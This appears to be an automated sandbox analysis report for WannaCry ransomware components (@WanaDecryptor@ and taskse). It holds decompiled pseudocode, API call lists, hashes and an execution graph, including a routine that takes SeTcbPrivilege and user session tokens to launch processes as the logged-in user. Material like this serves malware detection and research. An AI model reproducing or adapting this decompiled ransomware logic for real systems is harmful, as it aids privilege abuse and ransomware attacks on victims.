                                                      				_v16 = _t21;
                                                      				 *_t21 = 0x415c00;
                                                      				_v4 = 3;
                                                      				L00412D52();
                                                      				 *_t21 = 0x415bec;
                                                      				_t22 = __ecx + 0x64;
                                                      				_v16 = _t22;
                                                      				 *_t22 = 0x415c00;
                                                      				_v4 = 4;
                                                      				L00412D52();
                                                      				 *_t22 = 0x415bec;
                                                      				_v4 = 0;
                                                      				L00412CC2();
                                                      				_v4 = 0xffffffff;
                                                      				L00412C86();
                                                      				 *[fs:0x0] = _v12;
                                                      				return _t13;
                                                      			}












                                                      APIs
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D2C
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D4B
                                                      • #800.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D5E
                                                      • #641.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D6D
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414$#641#800
                                                      • String ID:
                                                      • API String ID: 2580907805-0
                                                      • Opcode ID: 16959137cf9ed8865fc6a78509c90b23480716c09409454935714356ef62aba6
                                                      • Instruction ID: 6757f658c1b9d10fae8a918e1fd1a20a9830f850e3759812b0851a74ca26fea9
                                                      • Opcode Fuzzy Hash: 16959137cf9ed8865fc6a78509c90b23480716c09409454935714356ef62aba6
                                                      • Instruction Fuzzy Hash: F3012975508B42CBC300DF19C54538AFBE8BBE4710F54491EE095877A1D7F851998BD6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E00404170(intOrPtr __ecx) {
                                                      				char _v4;
                                                      				intOrPtr _v12;
                                                      				intOrPtr* _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _t12;
                                                      				intOrPtr* _t20;
                                                      				intOrPtr _t25;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413776);
                                                      				_t12 =  *[fs:0x0];
                                                      				_push(_t12);
                                                      				 *[fs:0x0] = _t25;
                                                      				_v20 = __ecx;
                                                      				 *((intOrPtr*)(__ecx)) = 0x415cb0;
                                                      				_v4 = 0;
                                                      				_t20 = __ecx + 0x48;
                                                      				_v16 = _t20;
                                                      				 *_t20 = 0x415c00;
                                                      				_v4 = 3;
                                                      				L00412D52();
                                                      				 *_t20 = 0x415bec;
                                                      				_v4 = 1;
                                                      				L00412CC2();
                                                      				_v4 = 0;
                                                      				L00412CC2();
                                                      				_v4 = 0xffffffff;
                                                      				L00412D94();
                                                      				 *[fs:0x0] = _v12;
                                                      				return _t12;
                                                      			}











                                                      APIs
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
                                                      • #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
                                                      • #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
                                                      • #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #800$#2414#795
                                                      • String ID:
                                                      • API String ID: 932896513-0
                                                      • Opcode ID: de7d764f310d2b07daedf415afe273c0a0adcf5a3115b404c86b6cccc177a748
                                                      • Instruction ID: 4f5e1f32c4d0deb5ef0c4e05178b03e64e757a210687b4ed5005f9af419c08f7
                                                      • Opcode Fuzzy Hash: de7d764f310d2b07daedf415afe273c0a0adcf5a3115b404c86b6cccc177a748
                                                      • Instruction Fuzzy Hash: A3018F74108792CFC300DF19C14138AFFE4ABA4720F54491EE091833A2D7F85198CBE6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 91%
                                                      			E00402E00(void* __ecx, void* _a4, intOrPtr* _a8, char _a12) {
                                                      				intOrPtr* _t18;
                                                      				intOrPtr* _t22;
                                                      				intOrPtr _t23;
                                                      				intOrPtr _t30;
                                                      				intOrPtr* _t35;
                                                      				intOrPtr* _t37;
                                                      				void* _t40;
                                                      
                                                      				_t1 =  &_a12; // 0x40276a
                                                      				_t35 = _a8;
                                                      				if(_t35 ==  *_t1) {
                                                      					_t16 =  &_a4; // 0x40276a
                                                      					_t18 =  *_t16;
                                                      					 *_t18 = _t35;
                                                      					return _t18;
                                                      				} else {
                                                      					do {
                                                      						_t37 = _t35;
                                                      						_t35 =  *_t35;
                                                      						 *((intOrPtr*)( *((intOrPtr*)(_t37 + 4)))) =  *_t37;
                                                      						 *((intOrPtr*)( *_t37 + 4)) =  *((intOrPtr*)(_t37 + 4));
                                                      						_t30 =  *((intOrPtr*)(_t37 + 0xc));
                                                      						if(_t30 != 0) {
                                                      							_t23 =  *((intOrPtr*)(_t30 - 1));
                                                      							if(_t23 == 0 || _t23 == 0xff) {
                                                      								_push(_t30 + 0xfffffffe);
                                                      								L00412C98();
                                                      								_t40 = _t40 + 4;
                                                      							} else {
                                                      								 *((char*)(_t30 - 1)) = _t23 - 1;
                                                      							}
                                                      						}
                                                      						_push(_t37);
                                                      						 *((intOrPtr*)(_t37 + 0xc)) = 0;
                                                      						 *((intOrPtr*)(_t37 + 0x10)) = 0;
                                                      						 *((intOrPtr*)(_t37 + 0x14)) = 0;
                                                      						L00412C98();
                                                      						_t40 = _t40 + 4;
                                                      						_a8 = _a8 - 1;
                                                      					} while (_t35 != _a12);
                                                      					_t22 = _a4;
                                                      					 *_t22 = _t35;
                                                      					return _t22;
                                                      				}
                                                      			}











                                                      APIs
                                                      • #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E44
                                                      • #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E56
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #825
                                                      • String ID: j'@
                                                      • API String ID: 41483190-370697233
                                                      • Opcode ID: 9c0cb0aced43a296d20ff8ffc4d70ac1f7ba505f3886b3a42eb6c6f4aca8c5be
                                                      • Instruction ID: 592289367714aa5b9ee555d1ba3af08658367c911d5aba0fbb12e5c1e921281d
                                                      • Opcode Fuzzy Hash: 9c0cb0aced43a296d20ff8ffc4d70ac1f7ba505f3886b3a42eb6c6f4aca8c5be
                                                      • Instruction Fuzzy Hash: 771185B62046008FC724CF19D18096BFBE6FF99320714893EE29A97380D376EC05CBA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00407650(void* __ecx, intOrPtr _a4) {
                                                      				intOrPtr _t3;
                                                      				void* _t4;
                                                      
                                                      				_t3 = _a4;
                                                      				if(_t3 != 0x3e9) {
                                                      					if(_t3 == 0x3ea) {
                                                      						_t3 =  *((intOrPtr*)(__ecx + 0x820));
                                                      						if(_t3 == 0) {
                                                      							_t3 = E0040B620(L"Wana Decrypt0r 2.0", 0);
                                                      						}
                                                      					}
                                                      					L00412CBC();
                                                      					return _t3;
                                                      				} else {
                                                      					_t4 = E004076A0(__ecx, 1);
                                                      					L00412CBC();
                                                      					return _t4;
                                                      				}
                                                      			}






                                                      APIs
                                                      • #2379.MFC42 ref: 00407692
                                                        • Part of subcall function 004076A0: time.MSVCRT ref: 004076DA
                                                      • #2379.MFC42(00000001), ref: 00407667
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2379$time
                                                      • String ID: Wana Decrypt0r 2.0
                                                      • API String ID: 2017816395-4201229886
                                                      • Opcode ID: 6fa7a2fc7c6a80e94799593ebee71b884435da4c0666664eaea2c240bbcf3164
                                                      • Instruction ID: 44448bb0997210edcc5ff830349606876b09c28d76a722c823a6afa91302379c
                                                      • Opcode Fuzzy Hash: 6fa7a2fc7c6a80e94799593ebee71b884435da4c0666664eaea2c240bbcf3164
                                                      • Instruction Fuzzy Hash: 58E08631B0491017D6117B19A942B9F51845B60724F104C3FF506FA2C2E96E7D9183DF
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:83.8%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:56.6%
                                                      Total number of Nodes:53
                                                      Total number of Limit Nodes:2
                                                      execution_graph 115 40154c __set_app_type __p__fmode __p__commode 116 4015bb 115->116 117 4015c3 __setusermatherr 116->117 118 4015cf 116->118 117->118 127 4016b6 _controlfp 118->127 120 4015d4 _initterm __getmainargs _initterm 121 401628 GetStartupInfoA 120->121 123 40165c GetModuleHandleA 121->123 128 401510 __p___argc 123->128 126 401680 exit _XcptFilter 127->120 129 401520 __p___argv 128->129 130 40151b 128->130 133 401420 LoadLibraryA 129->133 130->126 132 401531 132->126 134 401449 GetProcAddress 133->134 135 40143e 133->135 136 401468 GetProcAddress 134->136 137 40145d 134->137 135->132 138 40147a 136->138 141 401485 136->141 137->132 138->132 139 4014a3 139->132 141->139 142 4014e1 Sleep 141->142 143 401000 GetModuleHandleA 141->143 142->139 142->141 144 401064 LoadLibraryA 143->144 145 401079 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 143->145 144->145 146 401405 144->146 145->146 147 4010c2 145->147 146->141 147->146 148 4010e8 GetModuleHandleA 147->148 149 4010f9 LoadLibraryA 148->149 150 40110e GetProcAddress GetProcAddress GetProcAddress 148->150 149->146 149->150 150->146 151 401138 150->151 151->146 152 401149 GetModuleHandleA 151->152 153 40115a LoadLibraryA 152->153 154 40116f GetProcAddress GetProcAddress 152->154 153->146 153->154 154->146 155 40118e 154->155 155->146 156 401196 GetModuleHandleA 155->156 157 4011a5 LoadLibraryA 156->157 158 4011b8 GetProcAddress 156->158 157->146 157->158 158->146 159 4011ca 158->159 160 4011e2 LookupPrivilegeValueA 159->160 161 4011f9 _local_unwind2 159->161 160->161 163 401204 AdjustTokenPrivileges 160->163 161->146 163->161 164 401275 163->164 165 40128b _local_unwind2 164->165 166 4012ab 164->166 165->141 166->161 167 401366 166->167 168 401377 167->168 169 40136b WaitForSingleObject 167->169 172 401398 168->172 169->168 173 40139f 172->173 174 4013e0 AdjustTokenPrivileges 173->174 175 401383 173->175 174->175 175->141 176 
40169e _exit

                                                      Callgraph

                                                      Control-flow Graph

                                                      C-Code - Quality: 48%
                                                      			E00401000(intOrPtr _a4, intOrPtr _a8, short _a12, intOrPtr _a16) {
                                                      				int _v8;
                                                      				char _v20;
                                                      				intOrPtr _v36;
                                                      				intOrPtr _v40;
                                                      				intOrPtr _v44;
                                                      				int _v48;
                                                      				signed int _v56;
                                                      				int _v60;
                                                      				_Unknown_base(*)()* _v68;
                                                      				intOrPtr _v72;
                                                      				intOrPtr _v76;
                                                      				struct _TOKEN_PRIVILEGES _v84;
                                                      				signed int _v88;
                                                      				_Unknown_base(*)()* _v92;
                                                      				_Unknown_base(*)()* _v96;
                                                      				_Unknown_base(*)()* _v100;
                                                      				_Unknown_base(*)()* _v108;
                                                      				signed int _v112;
                                                      				char _v116;
                                                      				char _v120;
                                                      				_Unknown_base(*)()* _v124;
                                                      				_Unknown_base(*)()* _v136;
                                                      				char _v140;
                                                      				struct _LUID _v148;
                                                      				long _v152;
                                                      				intOrPtr _v156;
                                                      				short _v176;
                                                      				CHAR* _v216;
                                                      				void _v220;
                                                      				char _v224;
                                                      				long _v228;
                                                      				long _v232;
                                                      				struct _TOKEN_PRIVILEGES _v240;
                                                      				void* __ebx;
                                                      				void* __ebp;
                                                      				signed int _t94;
                                                      				struct HINSTANCE__* _t101;
                                                      				intOrPtr _t107;
                                                      				struct HINSTANCE__* _t158;
                                                      				struct HINSTANCE__* _t160;
                                                      				struct HINSTANCE__* _t161;
                                                      				signed int _t162;
                                                      				intOrPtr _t165;
                                                      				void* _t166;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(0x402060);
                                                      				_push(0x401540);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t165;
                                                      				_t166 = _t165 - 0xdc;
                                                      				_v60 = 0;
                                                      				_v84.PrivilegeCount = 0;
                                                      				_v84.Privileges = 0;
                                                      				_v76 = 0;
                                                      				_v72 = 0;
                                                      				_v140 = 0;
                                                      				_v120 = 0;
                                                      				_v116 = 0;
                                                      				_v48 = 0;
                                                      				_v44 = 0;
                                                      				_v40 = 0;
                                                      				_v36 = 0;
                                                      				_t158 = GetModuleHandleA("advapi32.dll");
                                                      				if(_t158 != 0) {
                                                      					L2:
                                                      					_v68 = GetProcAddress(_t158, "OpenProcessToken");
                                                      					_v136 = GetProcAddress(_t158, "LookupPrivilegeValueA");
                                                      					_v108 = GetProcAddress(_t158, "AdjustTokenPrivileges");
                                                      					_v100 = GetProcAddress(_t158, "DuplicateTokenEx");
                                                      					_t94 = GetProcAddress(_t158, "CreateProcessAsUserA");
                                                      					_v88 = _t94;
                                                      					if(_v68 == 0 || _v136 == 0 || _v108 == 0 || _v100 == 0 || _t94 == 0) {
                                                      						goto L39;
                                                      					} else {
                                                      						_t160 = GetModuleHandleA("kernel32.dll");
                                                      						if(_t160 != 0) {
                                                      							L9:
                                                      							_v96 = GetProcAddress(_t160, "WTSGetActiveConsoleSessionId");
                                                      							_v92 = GetProcAddress(_t160, "GetCurrentProcess");
                                                      							_t94 = GetProcAddress(_t160, "CloseHandle");
                                                      							_v56 = _t94;
                                                      							if(_v96 == 0 || _v92 == 0 || _t94 == 0) {
                                                      								goto L39;
                                                      							} else {
                                                      								_t161 = GetModuleHandleA("userenv.dll");
                                                      								if(_t161 != 0) {
                                                      									L14:
                                                      									_v124 = GetProcAddress(_t161, "CreateEnvironmentBlock");
                                                      									_t94 = GetProcAddress(_t161, "DestroyEnvironmentBlock");
                                                      									_v112 = _t94;
                                                      									if(_v124 == 0 || _t94 == 0) {
                                                      										goto L39;
                                                      									} else {
                                                      										_t101 = GetModuleHandleA("wtsapi32.dll");
                                                      										if(_t101 != 0) {
                                                      											L18:
                                                      											_t94 = GetProcAddress(_t101, "WTSQueryUserToken");
                                                      											_t162 = _t94;
                                                      											if(_t162 == 0) {
                                                      												goto L39;
                                                      											} else {
                                                      												_v8 = 0;
                                                      												_push(_v92(0x28,  &_v60));
                                                      												if(_v68() == 0) {
                                                      													L37:
                                                      													_push(0xffffffff);
                                                      													_t94 =  &_v20;
                                                      													_push(_t94);
                                                      													goto L38;
                                                      												} else {
                                                      													_t94 = LookupPrivilegeValueA(0, "SeTcbPrivilege",  &_v148);
                                                      													if(_t94 != 0) {
                                                      														_v240.PrivilegeCount = 0;
                                                      														_v240.Privileges = 0;
                                                      														_v232 = 0;
                                                      														_v228 = 0;
                                                      														_v240.PrivilegeCount = 1;
                                                      														_v240.Privileges = _v148.LowPart;
                                                      														_v232 = _v148.HighPart;
                                                      														_v228 = 2;
                                                      														_t94 = AdjustTokenPrivileges(_v60, 0,  &_v240, 0x10,  &_v84,  &_v152);
                                                      														if(_t94 != 0) {
                                                      															_t107 = _a8;
                                                      															if(_t107 != 0xffffffff) {
                                                      																_v156 = _t107;
                                                      																goto L28;
                                                      															} else {
                                                      																_t107 = _v96();
                                                      																_v156 = _t107;
                                                      																if(_t107 != 0xffffffff) {
                                                      																	L28:
                                                      																	_t94 =  *_t162(_t107,  &_v140); // executed
                                                      																	if(_t94 != 0) {
                                                      																		_t94 = _v100(_v140, 0x2000000, 0, 1, 1,  &_v120);
                                                      																		if(_t94 != 0) {
                                                      																			_v224 = 0;
                                                      																			memset( &_v220, 0, 0x10 << 2);
                                                      																			_t166 = _t166 + 0xc;
                                                      																			_v224 = 0x44;
                                                      																			_v216 = "winsta0\\default";
                                                      																			_v176 = _a12;
                                                      																			_push(1);
                                                      																			_push(_v120);
                                                      																			_push( &_v116);
                                                      																			if(_v124() == 0) {
                                                      																				goto L37;
                                                      																			} else {
                                                      																				_push( &_v48);
                                                      																				_push( &_v224);
                                                      																				_push(0);
                                                      																				_push(_v116);
                                                      																				_push(0x400);
                                                      																				_push(0);
                                                      																				_push(0);
                                                      																				_push(0);
                                                      																				_push(0);
                                                      																				_push(_a4);
                                                      																				_push(_v120);
                                                      																				if(_v88() == 0) {
                                                      																					goto L37;
                                                      																				} else {
                                                      																					if(_a16 != 0) {
                                                      																						WaitForSingleObject(_v48, 0xffffffff);
                                                      																					}
                                                      																					_v8 = 0xffffffff;
                                                      																					E00401398(0);
                                                      																					 *[fs:0x0] = _v20;
                                                      																					return 0;
                                                      																				}
                                                      																			}
                                                      																		} else {
                                                      																			_push(0xffffffff);
                                                      																			_push( &_v20);
                                                      																			goto L38;
                                                      																		}
                                                      																	} else {
                                                      																		_push(0xffffffff);
                                                      																		_push( &_v20);
                                                      																		goto L38;
                                                      																	}
                                                      																} else {
                                                      																	_push(_t107);
                                                      																	_push( &_v20);
                                                      																	L00401546();
                                                      																	 *[fs:0x0] = _v20;
                                                      																	return 0;
                                                      																}
                                                      															}
                                                      														} else {
                                                      															_push(0xffffffff);
                                                      															_push( &_v20);
                                                      															goto L38;
                                                      														}
                                                      													} else {
                                                      														_push(0xffffffff);
                                                      														_push( &_v20);
                                                      														L38:
                                                      														L00401546();
                                                      														goto L39;
                                                      													}
                                                      												}
                                                      											}
                                                      										} else {
                                                      											_t94 = LoadLibraryA("wtsapi32.dll");
                                                      											if(_t94 == 0) {
                                                      												goto L39;
                                                      											} else {
                                                      												goto L18;
                                                      											}
                                                      										}
                                                      									}
                                                      								} else {
                                                      									_t94 = LoadLibraryA("userenv.dll"); // executed
                                                      									_t161 = _t94;
                                                      									if(_t161 == 0) {
                                                      										goto L39;
                                                      									} else {
                                                      										goto L14;
                                                      									}
                                                      								}
                                                      							}
                                                      						} else {
                                                      							_t94 = LoadLibraryA("kernel32.dll");
                                                      							_t160 = _t94;
                                                      							if(_t160 == 0) {
                                                      								goto L39;
                                                      							} else {
                                                      								goto L9;
                                                      							}
                                                      						}
                                                      					}
                                                      				} else {
                                                      					_t94 = LoadLibraryA("advapi32.dll"); // executed
                                                      					_t158 = _t94;
                                                      					if(_t158 == 0) {
                                                      						L39:
                                                      						 *[fs:0x0] = _v20;
                                                      						return _t94 | 0xffffffff;
                                                      					} else {
                                                      						goto L2;
                                                      					}
                                                      				}
                                                      			}

                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,?), ref: 00401058
                                                      • LoadLibraryA.KERNELBASE(advapi32.dll), ref: 00401069
                                                      • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00401085
                                                      • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 00401090
                                                      • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 0040109E
                                                      • GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004010A9
                                                      • GetProcAddress.KERNEL32(00000000,CreateProcessAsUserA), ref: 004010B4
                                                      • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004010ED
                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 004010FE
                                                      • GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 00401114
                                                      • GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 0040111F
                                                      • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 0040112A
                                                      • GetModuleHandleA.KERNEL32(userenv.dll), ref: 0040114E
                                                      • LoadLibraryA.KERNELBASE(userenv.dll), ref: 0040115F
                                                      • GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00401175
                                                      • GetProcAddress.KERNEL32(00000000,DestroyEnvironmentBlock), ref: 00401180
                                                      • GetModuleHandleA.KERNEL32(wtsapi32.dll), ref: 0040119B
                                                      • LoadLibraryA.KERNEL32(wtsapi32.dll), ref: 004011AA
                                                      • GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 004011BE
                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeTcbPrivilege,?), ref: 004011EF
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,?,?), ref: 00401263
                                                      • _local_unwind2.MSVCRT ref: 004013FD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000024.00000002.4519803798.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000024.00000002.4519766030.0000000000400000.00000002.00000001.01000000.00000011.sdmp
                                                      • Associated: 00000024.00000002.4519851925.0000000000402000.00000002.00000001.01000000.00000011.sdmp
                                                      • Associated: 00000024.00000002.4519889407.0000000000403000.00000004.00000001.01000000.00000011.sdmp
                                                      • Associated: 00000024.00000002.4519936527.0000000000404000.00000002.00000001.01000000.00000011.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_36_2_400000_taskse.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$HandleLibraryLoadModule$AdjustLookupPrivilegePrivilegesTokenValue_local_unwind2
                                                      • String ID: AdjustTokenPrivileges$CloseHandle$CreateEnvironmentBlock$CreateProcessAsUserA$DestroyEnvironmentBlock$DuplicateTokenEx$GetCurrentProcess$LookupPrivilegeValueA$OpenProcessToken$SeTcbPrivilege$WTSGetActiveConsoleSessionId$WTSQueryUserToken$advapi32.dll$kernel32.dll$userenv.dll$wtsapi32.dll
                                                      • API String ID: 991275522-4095908470
                                                      • Opcode ID: 3f61e722ca8088b632f897d1d5b6cf3ee36d8dd7d80411764f40106c482f8f63
                                                      • Instruction ID: a8daa8c7751dfcdc06dbaee4ace7374b5f05fd79cd89a88388c8f82615ea9d1e
                                                      • Opcode Fuzzy Hash: 3f61e722ca8088b632f897d1d5b6cf3ee36d8dd7d80411764f40106c482f8f63
                                                      • Instruction Fuzzy Hash: 07A13E71D002599BDB20DFA58C84BAEBBB8FB48711F10467FE519B72D0E77449418F58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 89 401398-40139d 90 4013a7 89->90 91 40139f-4013a5 89->91 92 4013aa-4013af 90->92 91->92 94 4013b1 92->94 95 4013b4-4013b9 92->95 94->95 96 4013c2-4013c7 95->96 97 4013bb-4013bf 95->97 98 4013c9 96->98 99 4013cc-4013d4 96->99 97->96 98->99 100 4013d6 99->100 101 4013d9-4013de 99->101 100->101 103 4013e0-4013f3 AdjustTokenPrivileges 101->103 104 4013f6 101->104 103->104
                                                      APIs
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,00401383), ref: 004013EA
                                                      Memory Dump Source
                                                      • Source File: 00000024.00000002.4519803798.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000024.00000002.4519766030.0000000000400000.00000002.00000001.01000000.00000011.sdmp
                                                      • Associated: 00000024.00000002.4519851925.0000000000402000.00000002.00000001.01000000.00000011.sdmp
                                                      • Associated: 00000024.00000002.4519889407.0000000000403000.00000004.00000001.01000000.00000011.sdmp
                                                      • Associated: 00000024.00000002.4519936527.0000000000404000.00000002.00000001.01000000.00000011.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_36_2_400000_taskse.jbxd
                                                      Similarity
                                                      • API ID: AdjustPrivilegesToken
                                                      • String ID:
                                                      • API String ID: 2874748243-0
                                                      • Opcode ID: ea4fe9ee62a20299c49249978a6f65f8c05524396715b8152d2cfc0051420814
                                                      • Instruction ID: c5c4706423aeddcfda8965a2f2378707b10bac3de658310f62e01f4fd8324524
                                                      • Opcode Fuzzy Hash: ea4fe9ee62a20299c49249978a6f65f8c05524396715b8152d2cfc0051420814
                                                      • Instruction Fuzzy Hash: 970146B5E10259ABDF10DAE8DCC49AEBBBDAB08304F54482AF905F7650C7789C848B64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      C-Code - Quality: 80%
                                                      			_entry_(void* __ebx, void* __edi, void* __esi) {
                                                      				CHAR* _v8;
                                                      				intOrPtr* _v24;
                                                      				intOrPtr _v28;
                                                      				struct _STARTUPINFOA _v96;
                                                      				int _v100;
                                                      				char** _v104;
                                                      				int _v108;
                                                      				void _v112;
                                                      				char** _v116;
                                                      				intOrPtr* _v120;
                                                      				intOrPtr _v124;
                                                      				intOrPtr* _t23;
                                                      				intOrPtr* _t24;
                                                      				void* _t27;
                                                      				void _t29;
                                                      				intOrPtr _t36;
                                                      				signed int _t38;
                                                      				int _t40;
                                                      				intOrPtr* _t41;
                                                      				intOrPtr _t42;
                                                      				intOrPtr _t46;
                                                      				intOrPtr _t47;
                                                      				intOrPtr _t49;
                                                      				intOrPtr* _t55;
                                                      				intOrPtr _t58;
                                                      				intOrPtr _t61;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(0x402070);
                                                      				_push(0x401540);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t58;
                                                      				_v28 = _t58 - 0x68;
                                                      				_v8 = 0;
                                                      				__set_app_type(2);
                                                      				 *0x4031b4 =  *0x4031b4 | 0xffffffff;
                                                      				 *0x4031b8 =  *0x4031b8 | 0xffffffff;
                                                      				_t23 = __p__fmode();
                                                      				_t46 =  *0x4031b0; // 0x0
                                                      				 *_t23 = _t46;
                                                      				_t24 = __p__commode();
                                                      				_t47 =  *0x4031ac; // 0x0
                                                      				 *_t24 = _t47;
                                                      				 *0x4031bc = _adjust_fdiv;
                                                      				_t27 = E004016CB( *_adjust_fdiv);
                                                      				_t61 =  *0x4031a0; // 0x1
                                                      				if(_t61 == 0) {
                                                      					__setusermatherr(E004016C8);
                                                      				}
                                                      				E004016B6(_t27);
                                                      				_push(0x40300c);
                                                      				_push(0x403008);
                                                      				L004016B0();
                                                      				_t29 =  *0x4031a8; // 0x0
                                                      				_v112 = _t29;
                                                      				__getmainargs( &_v100,  &_v116,  &_v104,  *0x4031a4,  &_v112);
                                                      				_push(0x403004);
                                                      				_push(0x403000);
                                                      				L004016B0();
                                                      				_t55 =  *_acmdln;
                                                      				_v120 = _t55;
                                                      				if( *_t55 != 0x22) {
                                                      					while( *_t55 > 0x20) {
                                                      						_t55 = _t55 + 1;
                                                      						_v120 = _t55;
                                                      					}
                                                      				} else {
                                                      					do {
                                                      						_t55 = _t55 + 1;
                                                      						_v120 = _t55;
                                                      						_t42 =  *_t55;
                                                      					} while (_t42 != 0 && _t42 != 0x22);
                                                      					if( *_t55 == 0x22) {
                                                      						L6:
                                                      						_t55 = _t55 + 1;
                                                      						_v120 = _t55;
                                                      					}
                                                      				}
                                                      				_t36 =  *_t55;
                                                      				if(_t36 != 0 && _t36 <= 0x20) {
                                                      					goto L6;
                                                      				}
                                                      				_v96.dwFlags = 0;
                                                      				GetStartupInfoA( &_v96);
                                                      				if((_v96.dwFlags & 0x00000001) == 0) {
